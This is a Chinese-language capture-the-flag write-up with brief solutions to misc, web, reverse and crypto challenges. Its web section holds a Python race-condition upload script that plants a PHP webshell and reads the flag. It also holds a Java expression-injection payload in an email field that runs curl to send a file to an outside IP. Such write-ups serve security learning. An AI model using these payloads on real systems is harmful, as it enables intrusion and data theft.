Misc

The word is not the word

zip打开,在document.xml文件中找到flag

Web

Do you secure

根据题目逻辑,上传了恶意文件会被删除,而且文件名以时间戳命名的,所以这里我们可以写脚本获取时间戳去条件竞争,在删文件之前执行php,写马出来

import time
import requests

url = 'http://39.104.54.21:21566/upload.php'
file = {
    'pic':('1.php',"<?php file_put_contents('/var/www/html/upload/hmhmhm.php','<?= @eval($_POST[1]);?>');?>")
}
geturl = 'http://39.104.54.21:21566/upload/'
data = {
    '1':"system('cat /f*');"
}
posttime = str(int(time.time()))
post = requests.post(url,files=file)
get = requests.get(geturl+posttime+'.php')
flag = requests.post("http://39.104.54.21:21566/upload/hmhmhm.php",data).text
print(flag)

ezwebweb

站点唯一的能和后端交互的点就是留言板,然后留言板只对email会有个过滤,然后目录是validateBody,搜了一下这个找到了这个文章https://moonsec.top/articles/64,其实就是用了BeanValidation来进行过滤的,然后这里没有能直接利用的注入poc,然后就找到了这个文章,这里的命令是可以rce的,https://yzddmr6.com/posts/java-expression-exploit/

{"username":"1111","tel":"19970959969","email":"1111@qq.com|${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),\"curl -F file=@/tmp/b http://121.40.49.4:8080\")}|","yourworks":"1111"}

Reverse

HeidunGame

jadx gui一把梭哈

Crypto

看不见不等于没有

vs打开可以看到一串疑似Morse码,接着将其复制到010里面更便于查看,然后尝试了很久摩斯无果,最后转01得到flag